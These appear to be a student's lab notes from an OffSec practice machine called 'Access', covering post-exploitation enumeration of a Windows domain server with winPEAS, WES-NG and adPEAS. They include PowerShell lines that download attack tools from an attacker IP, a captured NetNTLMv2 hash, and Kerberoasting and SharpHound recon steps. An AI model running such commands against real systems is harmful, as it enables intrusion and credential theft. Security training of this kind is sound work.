PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.171/winPEASany.exe -OutFile .\winPEASany.exeDelivery complete
/Practice/Access/4-Post_Enumeration/attachments/Pasted-image-20250421171829.png)
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
COMPUTERNAME: SERVER
USERPROFILE: C:\Users\svc_apache
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\svc_apache\AppData\Local
PSModulePath: C:\Users\svc_apache\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\svc_apache\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PSExecutionPolicyPreference: Restricted
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
AP_PARENT_PID: 3316
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: svc_apache
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
MPT: $P$G
SystemDrive: C:
TEMP: C:\Users\SVC_AP~1\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\svc_apache\AppData\Roaming
TMP: C:\Users\SVC_AP~1\AppData\Local\Temp
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: ACCESS
USERDNSDOMAIN: ACCESS.OFFSEC
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
Shell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101N/A
/Practice/Access/4-Post_Enumeration/attachments/{8ED6E0E8-E41F-48EC-86A1-1B79EBBDC440}.png)
/Practice/Access/4-Post_Enumeration/attachments/{5D4A840D-EDD3-4F8F-B204-9D0CD535B883}.png)
UAC
/Practice/Access/4-Post_Enumeration/attachments/{7D98042E-A81E-4764-BA29-C6377CBC3704}.png)
PowerShell
/Practice/Access/4-Post_Enumeration/attachments/{2242BC54-FE41-4E6D-B838-4D399D3235D0}.png)
NTLM
/Practice/Access/4-Post_Enumeration/attachments/{484BC38E-340C-4FAF-96DA-B631CA3EBF9D}.png)
/Practice/Access/4-Post_Enumeration/attachments/{8678A82E-610D-4D1F-83DD-65201D45C4ED}.png)
svc_apache::ACCESS:1122334455667788:2d106f02f59b276dfbba09c6a7d993e4:0101000000000000a08a22b5d0b2db0167955f9da51d8ef7000000000800300030000000000000000000000000300000fcec954aca360e8a28f587ab81f3f71342e784446bf2766b3d1e9cc83709ce6a0a0010000000000000000000000000000000000009000000000000000000
.NET
/Practice/Access/4-Post_Enumeration/attachments/{B273540A-589E-4D70-A44A-FCB0BAB9A5E2}-1.png)
Token Privileges (svc_apache)
/Practice/Access/4-Post_Enumeration/attachments/{5D39F412-3C2E-41C3-8147-CEED1D4F4D51}.png)
AutoLogon
/Practice/Access/4-Post_Enumeration/attachments/{C2CD3DAE-457D-4914-8428-9416793B2BC4}.png)
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ ACCESS
DefaultUserName REG_SZ
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xa3248381
ShutdownFlags REG_DWORD 0x8000022b
DisableLockWorkstation REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyProcesses/Services
/Practice/Access/4-Post_Enumeration/attachments/{C65A27BF-93A2-4C0D-9BEE-3790326C71D0}.png)
/Practice/Access/4-Post_Enumeration/attachments/{C0D98F49-374F-48FF-BEA2-E634D146BBBB}.png)
/Practice/Access/4-Post_Enumeration/attachments/{74E6221D-C81C-4A62-8C56-B972FCDD8A0D}.png)
Modifiable Service
/Practice/Access/4-Post_Enumeration/attachments/{9AC4463F-F940-4912-AB50-03648E3BF5E2}.png)
SMB
/Practice/Access/4-Post_Enumeration/attachments/{F1DE9028-C217-450D-A038-895D71C08E11}.png)
Kerberos
/Practice/Access/4-Post_Enumeration/attachments/{DD3EEC54-B04A-4745-AD7B-32DE8A55D8CB}.png)
Interesting Files / Directory
/Practice/Access/4-Post_Enumeration/attachments/{46320F96-3E3A-483C-8159-0E5645091945}.png)
Write access to the C:\xampp directory
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2019
- Generation: 2019
- Build: 17763
- Version: 1809
- Architecture: x64-based
- Installed hotfixes (13): KB5009472, KB4512577, KB4535680, KB4577586, KB4589208, KB5003243, KB5003711, KB5005112, KB5011551, KB5006754, KB5009642, KB5011574, KB5005701
[+] Loading definitions
- Creation date of definitions: 20250418
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows Server 2019
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2019
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
[-] Missing patches: 3
- KB4535101: patches 4 vulnerabilities
- KB4578966: patches 4 vulnerabilities
- KB: patches 2 vulnerabilities
[I] KB with the most recent release date
- ID: KB
- Release date: 20250415
[+] Done. Displaying 10 of the 1598 vulnerabilities found.adPEAS
PS C:\tmp> iwr -Uri http://192.168.45.171/adPEAS.ps1 -OutFile .\adPEAS.ps1Delivery complete
/Practice/Access/4-Post_Enumeration/attachments/{911853FB-C8D4-403F-9D99-A7E11642C301}.png)
Executing adPEAS
Domain
/Practice/Access/4-Post_Enumeration/attachments/{DD87DFE5-7FCD-4CB9-8846-9B56001DE2C2}.png)
/Practice/Access/4-Post_Enumeration/attachments/{3D325FBB-9721-4F47-AB60-C33D26B1DEF9}.png)
Add-Computer
/Practice/Access/4-Post_Enumeration/attachments/{3AC7E387-8EC9-4FF9-81EA-D1486F5AA7DE}-1.png)
Kerberoasting
/Practice/Access/4-Post_Enumeration/attachments/{B137250C-CF3A-4A37-BACF-2402E9C7F72F}.png)
svc_mssql
SharpHound
/Practice/Access/4-Post_Enumeration/attachments/{A4DC4FCD-6A41-4FAE-A5C6-1BDAD45A9446}.png)